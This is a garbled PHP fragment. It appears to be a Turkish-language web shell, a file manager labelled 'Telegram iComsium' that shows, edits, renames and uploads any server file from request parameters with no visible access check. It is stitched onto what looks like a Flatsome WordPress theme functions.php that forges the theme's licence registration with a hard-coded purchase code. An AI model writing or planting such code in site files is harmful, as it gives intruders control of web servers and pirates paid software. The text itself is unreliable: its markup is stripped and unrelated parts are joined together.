Dosya kaydedildi.

"; } // -------- Dosya yeniden adlandırma -------- if (isset($_POST['rename_file']) && isset($_POST['new_name'])) { $old = $_POST['rename_file']; $dir = dirname($old); $new = $dir . '/' . basename($_POST['new_name']); if (rename($old, $new)) { echo "Dosya yeniden adlandırıldı.

"; } else { echo "Yeniden adlandırma başarısız!

"; } } // -------- Dosya yükleme -------- if (isset($_FILES['upload_file'])) { $target = rtrim($path, '/') . '/' . basename($_FILES['upload_file']['name']); if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $target)) { echo "Dosya yüklendi: " . basename($target) . "

"; } else { echo "Yükleme hatası!

"; } } echo "Telegram iComsium Current root: $root
"; echo "Current path: $path
"; echo '..
'; foreach (glob(rtrim($path,'/').'/*') as $file) { echo ''.basename($file).''; if (is_file($file)) { echo ' | [Göster]'; echo ' | [Düzenle]'; echo ' | [Yeniden Adlandır]'; } echo "
"; } echo "
"; // -------- Dosya düzenleme arayüzü -------- if (isset($_GET['edit']) && is_file($_GET['edit'])) { $editFile = $_GET['edit']; $content = htmlspecialchars(file_get_contents($editFile)); echo "

Dosya Düzenle: ".basename($editFile)."

"; echo '



'; } // -------- Dosya yeniden adlandırma arayüzü -------- if (isset($_GET['rename']) && is_file($_GET['rename'])) { $renameFile = $_GET['rename']; echo "

Dosya Yeniden Adlandır: ".basename($renameFile)."

"; echo '
Yeni isim:


'; } // -------- Dosya yükleme formu -------- echo '

Dosya Yükle

'; ?> 'new_id_123456', 'type' => 'PUBLIC', 'domain' => $domain_name, 'registeredAt' => '2021-07-18T12:51:10.826Z', 'purchaseCode' => 'd9312df0-0cfc-4f64-9008-cac584881ac1', 'licenseType' => 'Regular License', 'errors' => array(), 'show_notice' => false ); update_option('flatsome_registration', $update_option_data, 'yes'); update_option( 'flatsome_wup_supported_until', '01.11.2025' ); update_option( 'flatsome_wup_buyer', 'webkhoinghiep' ); require get_template_directory() . '/inc/init.php'; flatsome()->init(); /** * It's not recommended to add any custom code here. Please use a child theme * so that your customizations aren't lost during updates. * * Learn more here: https://developer.wordpress.org/themes/advanced-topics/child-themes/ */